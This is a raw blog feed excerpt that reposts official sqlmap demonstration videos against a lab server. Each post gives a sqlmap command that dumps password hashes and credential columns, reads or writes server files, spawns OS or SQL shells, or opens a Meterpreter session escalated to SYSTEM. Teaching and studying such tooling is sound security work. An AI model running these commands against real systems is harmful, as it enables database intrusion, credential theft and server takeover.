&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/RsQ52eCcTi4?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/RsQ52eCcTi4?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being PostgreSQL 8.4. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server then escalating database process' user privileges to SYSTEM. sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database. &lt;br /&gt;
&lt;br /&gt;
Then it asks the user for options to create the Metasploit shellcode and executes it in-memory within the database process via the injected sys_bineval() user-defined function. &lt;br /&gt;
&lt;br /&gt;
The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/iis/get_int_84.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-9066839438568062844?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/9066839438568062844'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/9066839438568062844'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_727.html' title='HOWTO : Offical SQLMap video demonstration 10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-463780876779140051</id><published>2011-09-15T14:17:00.000+08:00</published><updated>2011-09-15T14:17:12.472+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 9</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/qGxR7kSL9bM?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/qGxR7kSL9bM?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap command execution features: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being MySQL 5.0. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by spawning an interactive command prompt where the user can execute commands on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database then shows the command prompt. &lt;br /&gt;
&lt;br /&gt;
For each command the user can choose if he wants to retrieve the command standard output or, alternatively, automatically retrieve the output for all commands. If the answer is positive (y or a), sqlmap executes the command once and stores its standard output in a support table. &lt;br /&gt;
&lt;br /&gt;
Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards. &lt;br /&gt;
&lt;br /&gt;
This technique is also implemented for PostgreSQL. On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/iis/get_int_50.aspx?id=1 --os-shell -v 1 --union-use&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-463780876779140051?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/463780876779140051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/463780876779140051'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_5257.html' title='HOWTO : Offical SQLMap video demonstration 9'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1896448555651175721</id><published>2011-09-15T14:11:00.002+08:00</published><updated>2011-09-15T14:11:52.725+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 8</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="640" height="480" src="http://www.youtube.com/embed/K2MEecFNrK8" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap command execution features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by executing a command on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database. Then it asks the user if he wants to retrieve the command standard output. &lt;br /&gt;
&lt;br /&gt;
If the answer is positive, sqlmap executes the command once and stores its standard output in a support table. Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards. This technique is also implemented for MySQL.&lt;br /&gt;
&lt;br /&gt;
On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.8.4.php?id=1 --os-cmd "id" -v 1&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1896448555651175721?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1896448555651175721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1896448555651175721'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_5282.html' title='HOWTO : Offical SQLMap video demonstration 8'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/K2MEecFNrK8/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-141744438181276901</id><published>2011-09-15T14:01:00.002+08:00</published><updated>2011-09-15T14:01:24.957+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 7</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/FfFhtw8YT_s?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/FfFhtw8YT_s?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap file system write access features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.3. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by uploading a local file to the database server file system. sqlmap encoded the local file in base64, insert it into a temporary support table then abuses the PostgreSQL Large Object functions to export it to a file on the underlying file system.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-141744438181276901?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/141744438181276901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/141744438181276901'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_9414.html' title='HOWTO : Offical SQLMap video demonstration 7'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-7447651282365641632</id><published>2011-09-15T13:56:00.002+08:00</published><updated>2011-09-15T13:56:48.094+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 6</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="640" height="480" src="http://www.youtube.com/embed/ylttGlSkrGU" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap file system read access features: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by retrieving a file from the database server file system. The file is stored locally on the user's machine and can be either a text or a binary file. &lt;br /&gt;
&lt;br /&gt;
The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/mssql/iis/get_int.asp?id=1 --read-file "C:\example.txt" -v 2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-7447651282365641632?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7447651282365641632'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7447651282365641632'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_1310.html' title='HOWTO : Offical SQLMap video demonstration 6'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/ylttGlSkrGU/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4138325919420581330</id><published>2011-09-15T13:50:00.002+08:00</published><updated>2011-09-15T13:50:12.989+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 5</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/whSDF8KOtK4?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/whSDF8KOtK4?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap custom enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by spawning a SQL shell where it is possible to provide custom SQL statements to be executed on the back-end database management system. sqlmap analyzes the provided SQL statement, decides which technique to use to execute it and proceeds accordingly.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_int.php?id=1 --sql-shell -v 2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4138325919420581330?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4138325919420581330'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4138325919420581330'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_8731.html' title='HOWTO : Offical SQLMap video demonstration 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5673395532327797822</id><published>2011-09-15T13:46:00.000+08:00</published><updated>2011-09-15T13:46:09.300+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 4</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/71vrJJgpwvo?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/71vrJJgpwvo?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap in-depth enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by enumerating and dumping entries of all databases' tables containing one or more of the columns specified by the user. sqlmap always stores dumped entries in a local CSV file upon successful dump. &lt;br /&gt;
&lt;br /&gt;
The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --dump -C 'user,pass' -v 1 --exclude-sysdbs&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5673395532327797822?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5673395532327797822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5673395532327797822'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_5309.html' title='HOWTO : Offical SQLMap video demonstration 4'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-463817369023115638</id><published>2011-09-15T13:40:00.002+08:00</published><updated>2011-09-15T13:40:43.707+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 3</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/2JmPtczg974?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/2JmPtczg974?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap options' granularity with verbose output: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by dumping only from the second to the third entry of column surname of table users in the database testdb.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-463817369023115638?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/463817369023115638'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/463817369023115638'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_6142.html' title='HOWTO : Offical SQLMap video demonstration 3'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3253852565770161065</id><published>2011-09-15T13:34:00.001+08:00</published><updated>2011-09-15T13:34:49.768+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 2</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/DxPraM9GPxE?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/DxPraM9GPxE?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap enumeration features with verbose output: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections, check if they are also exploitable via UNION query SQL injection technique, then enumerate the banner and the session user's password hash(es). &lt;br /&gt;
&lt;br /&gt;
The technique used to dump this data from the back-end database software is specified by the user as UNION query SQL injection. If the parameter was not affected by UNION query SQL injection, sqlmap would have fallen back to the default technique, boolean-based blind SQL injection.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_init.php?id=1 -b --passwords -U CU --union-use -v 2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3253852565770161065?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3253852565770161065'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3253852565770161065'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_15.html' title='HOWTO : Offical SQLMap video demonstration 2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-866573033203556200</id><published>2011-09-15T13:28:00.002+08:00</published><updated>2011-09-15T13:41:23.790+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 1</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/fGBQm9Nfn24?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/fGBQm9Nfn24?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap database fingerprint and enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by extensively fingerprinting the back-end database management system, then enumerate the banner, the session user, the current database, the database's users, users' password hashes and available databases. &lt;br /&gt;
&lt;br /&gt;
The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/get_init.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-866573033203556200?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/866573033203556200'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/866573033203556200'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video.html' title='HOWTO : Offical SQLMap video demonstration 1'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1685485982442128037</id><published>2011-09-12T11:03:00.009+08:00</published><updated>2011-09-12T13:00:00.762+08:00</updated><title type='text'>HOWTO : Penetration Testing in the Real World</title><content type='html'>&lt;code&gt;&lt;b&gt;*** Do NOT attack any computer or network without authorization or you may be put into jail. ***&lt;/b&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : muts (of Offensive Security)&lt;br /&gt;
&lt;br /&gt;
This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
